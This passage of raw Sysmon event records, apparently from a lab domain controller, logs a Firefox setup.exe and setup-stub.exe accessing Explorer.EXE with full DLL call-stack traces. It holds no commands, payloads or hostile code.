dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 11241100x800000000000000015534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.599{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\xul.dll2021-01-18 13:59:52.599 10341000x800000000000000015533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 